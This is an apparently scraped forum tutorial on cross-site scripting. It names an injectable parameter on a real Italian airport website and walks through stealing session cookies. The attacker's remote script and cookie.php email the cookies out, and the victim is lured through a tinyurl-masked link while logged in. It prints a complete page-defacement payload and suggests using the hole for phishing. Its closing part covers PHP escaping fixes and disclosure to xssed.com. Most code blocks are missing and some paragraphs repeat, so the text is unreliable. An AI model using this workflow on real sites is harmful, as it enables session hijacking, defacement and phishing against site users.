This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.

Now we try to write:

Code:

If this xss works, we will see on the screen the alert within our cookies session of the site.

Or if he had not run the url just check and see how it is generated:

Example:

Last xss that I have discovered is on “aeroporto di Puglia” website:

http://www.seap-puglia.it/

if we try to find “><script>alert(‘try_xss’);</script> nothing happens.
But now look at the url:

Link:

we find the variable that makes it possible to search, in this case “strRicerca1″

Then apply the alert code directly after this variable:

Link:

We will magically appear the alert.

Now we try to write:

Link:

Perfect! We see our cookie!

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim

If we want include a file with javascript we can write:

Code:

Inside the file “cookiescript.js” we write a code that displays the cookie and sends it by e-mail.

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim

Howto include a javascript file:

Into cookiescript.js we will write a code that displays the cookie and sends it by email.

First of all we need to create a redirect to our site including the variable of cookies.

then:

Now we create cookie.php

Now upload cookie.php and cookiescript.js on our server and then go to:

If everything works we will receiving cookie by email.

Now we send link to victim…we can send extended link or use a redirect service like http://www.tinyurl.com

Once created redirect, in this case http://tinyurl.com/2rgry5 , we can contact user, possibly through the same site to make sure that it open the link when it’s is logged on the site.

XSS THAT DOESN’T WORK

If a xss does not work and therefore do not have the chance of a redirect or not displaying cookies, it can be used as a phishing page.

An example of code is:

var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{ document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor; txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") { var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg); }
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD'; footer.innerHTML = title;
overLay.appendChild(footer);}


This code must be entered in this way:

Code:

In this way we will see javascript that we created.

Even in this case we can rely on tinyurl to mask our complete url and include directly redirect.

Another way to bring the victim on the page that we want is this:

For fix the problem of cross site injection we have to use one of the 3 functions php.

These functions clean up the HTML tags, so is not possible inject into the code.

The function more used is htmlspecialchars() that transmutes all the characters “<” and “>” into “&lt;” and “&gt”.

Another option is htmlentities(), which replaces all the characters in the corresponding entities.

• An example of htmlentities()

The first show –> A ‘quote’ is &lt;b&gt;bold&lt;/b&gt;
The second –> A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;

• An example of htmlspecialchars()

This show –> &lt;a href=’test’&gt;Test&lt;/a&gt;
The funztion strip_tags(), instead, deletes all HTML elements, except certain elements that need to specify permitted such as <i>, <b> or <p>.

• An example of strip_tags()

Now that we know at least that there are these functions, we will to apply into the code when we find a xss in our web application.

I have recently found a xss on my website in Video section of GoogleBig which is a plugin of Mybb forum, I have placed a piece of code to make the idea of how I had to apply the function to fix the search bug.

First of all I have found the php page in question: search.php

Now let’s look for the portion of code that makes available research, query and output the result of the query:

In this case the variable that passes the values is $query then we apply the function htmlentities():

If you have problems you can post here, or consult the manuals on these 3 php functions that we saw:

http://php.net/htmlentities
http://php.net/htmlspecialchars
http://php.net/strip_tags

This guide was created for information purposes only.

If u have found a xss u must post it here http://www.xssed.com/submit and u must contact the vulnerable site’s admin.

My Xssed websites: http://xssed.com/archive/author=Langy/